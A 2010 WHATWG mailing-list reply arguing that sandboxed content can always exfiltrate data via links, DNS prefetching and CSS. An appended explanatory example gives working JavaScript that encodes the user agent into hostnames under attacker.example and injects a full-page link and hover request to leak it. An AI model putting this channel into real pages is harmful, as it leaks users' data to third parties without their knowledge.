- From: Adam Barth <whatwg@adambarth.com>
- Date: Mon, 25 Jan 2010 06:29:42 +0000
On Sun, Jan 24, 2010 at 8:09 PM, Aryeh Gregor <Simetrical+w3c at gmail.com> wrote:
> On Sun, Jan 24, 2010 at 6:19 AM, Adam Barth <whatwg at adambarth.com> wrote:
>> In general, stopping malicious content from exfiltrating data isn't
>> practical. For example, even including a single hyperlink is often
>> sufficient to exfiltrate a large amount of data. In user agents that
>> prefetch DNS, the user doesn't even need to click on the link.
>
> DNS prefetching doesn't tell you anything except that someone viewed
> the link, right? And maybe what their ISP is, in a typical case.
> Including an image tells you their IP address, User-Agent, and so on.

That depends what information the attacker encodes in the host name.
Recall that we're imagining the attacker gets to run JavaScript within
the sandbox, so, for example, the attacker can read the user agent and
encode that in the host name.

> How can you get any data out of a link with no DNS prefetching? Some
> users will click the link, but not all. Maybe quite a lot if you
> allow arbitrary CSS, of course . . . you could easily make the whole
> post a link. But "everyone who clicks on a given post for some
> reason" is still a lot less than "all viewers", which is what image
> inclusions will do.

Well, given that the attacker can use CSS, the attacker can make the
hyperlink fill the entire content area (or at least the area occupied by
the iframe). The attacker can also use the :hover selector to make
interesting things happen when the user mouses over the link.

The point is that stopping exfiltration is a losing battle that we
shouldn't bother to play.

Adam
Received on Sunday, 24 January 2010 22:29:42 UTC
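The technique Adam describes, as an added example that is not part of the original thread or of any WHATWG text: sandboxed script reads `navigator.userAgent` (or anything else it can see), encodes it into DNS-safe labels under an attacker-controlled zone, and emits a hyperlink that CSS stretches over the whole content area. The attacker domain `attacker.example`, the hostname layout (a sequence label followed by base32 payload labels) and the decoder that the attacker's authoritative name server would run are assumptions for the illustration. The encoding and decoding parts run under Node; the HTML fragment is what the sandboxed page would insert.

```javascript
// Added example (not from the thread): carrying data in a DNS name so that
// resolution alone, e.g. by a prefetching user agent, delivers it to the
// attacker's authoritative server. Domain and layout are assumed.

// Lowercase RFC 4648 base32 alphabet: DNS labels are case-insensitive and
// limited to letters, digits and '-', so base64 or hex-with-case won't do.
const BASE32 = "abcdefghijklmnopqrstuvwxyz234567";

function base32Encode(bytes) {
  let bits = 0, value = 0, out = "";
  for (const b of bytes) {
    value = (value << 8) | b;
    bits += 8;
    while (bits >= 5) {
      out += BASE32[(value >>> (bits - 5)) & 31];
      bits -= 5;
      value &= (1 << bits) - 1; // keep only the unemitted low bits
    }
  }
  if (bits > 0) out += BASE32[(value << (5 - bits)) & 31]; // zero-pad last group
  return out;
}

function base32Decode(str) {
  let bits = 0, value = 0;
  const out = [];
  for (const c of str) {
    const idx = BASE32.indexOf(c);
    if (idx < 0) throw new Error("bad base32 char: " + c);
    value = (value << 5) | idx;
    bits += 5;
    if (bits >= 8) {
      out.push((value >>> (bits - 8)) & 0xff);
      bits -= 8;
      value &= (1 << bits) - 1;
    }
  }
  return Uint8Array.from(out); // leftover <8 bits are encoder padding, dropped
}

// Build "<seq>.<label>.<label>...<attackerDomain>". DNS limits each label to
// 63 characters and the whole name to 253, so one link carries at most a
// couple of hundred bytes; larger data is split across several links.
// The sequence label makes each name unique, so resolver caching does not
// swallow repeated payloads and the receiver can reassemble in order.
function encodeAsHostname(text, attackerDomain, seq = 0) {
  const payload = base32Encode(new TextEncoder().encode(text));
  const labels = [];
  for (let i = 0; i < payload.length; i += 63) labels.push(payload.slice(i, i + 63));
  const host = [String(seq), ...labels, attackerDomain].join(".");
  if (host.length > 253) {
    throw new Error("payload too long for one host name; split it across several links");
  }
  return host;
}

// What the attacker's authoritative name server does with each query name.
function decodeFromHostname(host, attackerDomain) {
  const suffix = "." + attackerDomain;
  if (!host.endsWith(suffix)) throw new Error("not our zone: " + host);
  const labels = host.slice(0, -suffix.length).split(".");
  const seq = Number(labels.shift());
  const text = new TextDecoder().decode(base32Decode(labels.join("")));
  return { seq, text };
}

// The fragment a sandboxed page would inject: a single <a> stretched over the
// viewport (Adam's CSS point), so a click, a hover or a DNS prefetch of the
// href all reach the attacker. Whether <a href> triggers a prefetch is a
// user-agent decision; the fragment itself is just markup.
function exfilLinkHtml(host) {
  return `<style>
  a.x { position: fixed; top: 0; left: 0; width: 100%; height: 100%; display: block; }
  a.x:hover { background: url("http://${host}/hover.png"); } /* fires on mouse-over */
</style>
<a class="x" href="http://${host}/">&nbsp;</a>`;
}

// Stand-alone demonstration with a constructed User-Agent string.
if (typeof require !== "undefined" && require.main === module) {
  const ua = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36";
  const host = encodeAsHostname(ua, "attacker.example", 1);
  console.log(host);
  console.log(decodeFromHostname(host, "attacker.example"));
  console.log(exfilLinkHtml(host));
}
```

Nothing here needs the user to click: a user agent that resolves link targets ahead of time sends the query as soon as the markup renders, which is why the thread treats "just a hyperlink" as an exfiltration channel and concludes that blocking the channel is not a realistic goal. Browsers that do prefetch honor an `X-DNS-Prefetch-Control: off` response header on the embedding page, but that only removes the zero-interaction path; the full-viewport link and the `:hover` trigger remain.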